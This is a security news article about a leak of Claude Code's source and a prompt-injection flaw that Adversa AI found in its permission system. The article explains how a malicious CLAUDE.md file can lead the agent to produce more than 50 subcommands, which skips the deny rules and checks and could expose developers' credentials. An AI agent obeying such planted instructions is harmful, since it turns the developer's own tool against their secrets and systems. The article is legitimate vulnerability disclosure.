Critical Vulnerability in Claude Code Emerges Days After Source Leak
Critical vulnerability discovered in Claude Code allows bypass of permission system via prompt injection.
Summary
Within days of Anthropic accidentally leaking Claude Code's source code (512K lines of TypeScript) to npm on March 31, 2026, security researchers at Adversa AI discovered a critical vulnerability in the permission system. The flaw allows attackers to bypass deny rules through prompt injection by crafting malicious commands exceeding 50 subcommands, triggering a fallback to generic 'ask' prompts without proper safety analysis, potentially enabling credential theft and supply chain compromise.
Full text
Anthropic’s Claude Code is in the news again, and not for the best reasons. Within days of each other, Anthropic leaked the source code of Claude Code, and then Adversa AI found a critical vulnerability in it.

Claude Code Leak

On March 31, 2026, Anthropic mistakenly published a debugging JavaScript sourcemap for Claude Code v2.1.88 to npm. Within hours, researcher Chaofan Shou discovered the sourcemap and posted a link on X, kicking off a global rush to examine the de-obfuscated Claude Code source. Sigrid Jin, a 25-year-old student at the University of British Columbia, worked with Yeachan Heo to reconstruct the Claude Code source. “It took two humans, 10 OpenClaws, a MacBook Pro laptop, and a few hours to recreate the popular AI agent’s source code and share it with the world,” reports Yahoo, proving that what goes up (on the internet) does not come down (off the internet). The result now persists on the internet, comprising 512,000 lines of TypeScript in 1,900 files.

It is awkward but not catastrophic for Anthropic. “While the Claude Code leak does present real risk, it is not the same as model weights, training data or customer data being compromised. What was exposed is something more like an operational blueprint of how the current version of Claude Code is designed to work,” explains Melissa Bischoping, senior director of security & product design research at Tanium.

The key is that researchers can see how Claude Code is meant to work but cannot recreate it, because the leak does not include the Claude model weights, the training data, customer data, APIs or credentials. “It is not a foolproof roadmap to exploitation, but it is meaningful insight into how the tool handles inputs, enforces permissions and resists abuse,” continues Bischoping.

“Another layer of risk from this leak is that adversaries may use the blueprint to build lookalikes that appear and behave like Claude Code on the surface, but install malware or harvest credentials and data,” she adds. Awkward and embarrassing for Anthropic, but not directly harmful to Claude Code.

Vulnerability in Claude Code

But a genuine and critical vulnerability has now been discovered in Claude Code proper by the Adversa AI Red Team. “Claude Code is… a 519,000+ line TypeScript application that allows developers to interact with Claude directly from the command line. It can edit files, execute shell commands, search codebases, manage git workflows, and orchestrate complex multi-step development tasks,” reports Adversa.

Claude Code includes a permission system based on allow rules (auto-approve specific commands), deny rules (hard-block specific commands), and ask rules (always prompt). Adversa provides an example:

{ "deny": ["Bash(curl:*)", "Bash(wget:*)"], "allow": ["Bash(npm:*)", "Bash(git:*)"] }

This means: never allow curl or wget (to prevent data exfiltration), but auto-allow npm and git commands (common development tools). That sounds correct and reasonable. The flaw, however, is that the deny rules can be bypassed. “The permission system is the primary security boundary between the AI agent and the developer’s system,” reports Adversa. “When it fails silently, the developer has no safety net.”

The problem stems from Anthropic’s fix for a performance issue: complex compound commands caused the UI to freeze. Anthropic addressed this by capping analysis at 50 subcommands, with a fallback to a generic ‘ask’ prompt for anything larger. The code comment states, “Fifty is generous: legitimate user commands don’t split that wide. Above the cap we fall back to ‘ask’ (safe default — we can’t prove safety, so we prompt).” The flaw discovered by Adversa is that this process can be manipulated.

Anthropic’s assumption doesn’t account for AI-generated commands produced by prompt injection, where a malicious CLAUDE.md file instructs the AI to generate a pipeline of more than 50 subcommands that looks like a legitimate build process. When this happens, the code path returns “behavior: ‘ask’, // NOT ‘deny’” immediately. “Deny rules, security validators, command injection detection — all skipped,” writes Adversa. The over-cap command falls back to ask as designed, but the user gets no indication that all deny rules have been ignored.

Adversa warns that a motivated attacker could embed real-looking build steps in a malicious repository’s CLAUDE.md. It would look routine, but no per-subcommand analysis runs at all when the count exceeds 50. This could allow the attacker to exfiltrate SSH private keys, AWS credentials, GitHub tokens, npm tokens or environment secrets. It could lead to credential theft at scale, supply chain compromise, cloud infrastructure breach and CI/CD pipeline poisoning.

“During testing, Claude’s LLM safety layer independently caught some obviously malicious payloads and refused to execute them. This is good defense-in-depth,” writes Adversa. “However, the permission system vulnerability exists regardless of the LLM layer — it is a bug in the security policy enforcement code. A sufficiently crafted prompt injection that appears as legitimate build instructions could bypass the LLM layer too.”

Written By Kevin Townsend

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft.